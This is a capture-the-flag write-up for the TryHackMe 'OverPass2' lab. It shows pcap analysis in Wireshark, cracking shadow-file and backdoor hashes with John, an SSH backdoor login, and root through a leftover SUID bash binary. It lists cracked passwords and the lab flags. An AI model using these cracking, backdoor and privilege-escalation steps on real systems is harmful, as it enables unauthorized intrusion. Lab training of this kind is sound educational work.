OverPass2
Target Details
IP: 10.10.145.49
Analyze pcap file
Download pcap file
Open with wireshark
sudo wiresharkFollow TCP streams, you'll find all the answers to the questions
Crack Hashes from the WireShark packets
Download fasttrack wordlist
Dump users from shadow file while analyzing packets in
shadow_dump.txtfileUser Shadow File Passwords using John
john -w=/usr/share/wordlists/fasttrack.txt shadow_dump.txtuser hashes are stored in
shadow_dump.txtfileUsernamePasswordbee
secret12
szymex
abcd123
muirland
1qaz2wsx
paradox
secuirty3
Get hash from packet file and hard coded salt from
ssh-backdoorGitHub repoStore them in
hash.txtfile inhash:saltformatCrack using John
john -w=/usr/share/wordlists/rockyou.txt hash.txtUsernamePasswordjames
november16
Hack Again
Login using Backdoor SSH, since we already know the password
ssh -p 2222 james@10.10.145.49Get User Flag
cat /home/james/user.txt # thm{d119b4fa8c497ddb0525f7ad200e6567}On listing hidden files, we get
.suid_bashwhich can be run as root/home/james/.suid_bash -p .suid_bash-4.4#We've rooted the machine
.suid_bash-4.4# whoami rootGet root flag
.suid_bash-4.4# cat /root/root.txt thm{d53b2684f169360bb9606c333873144d}
Last updated
Was this helpful?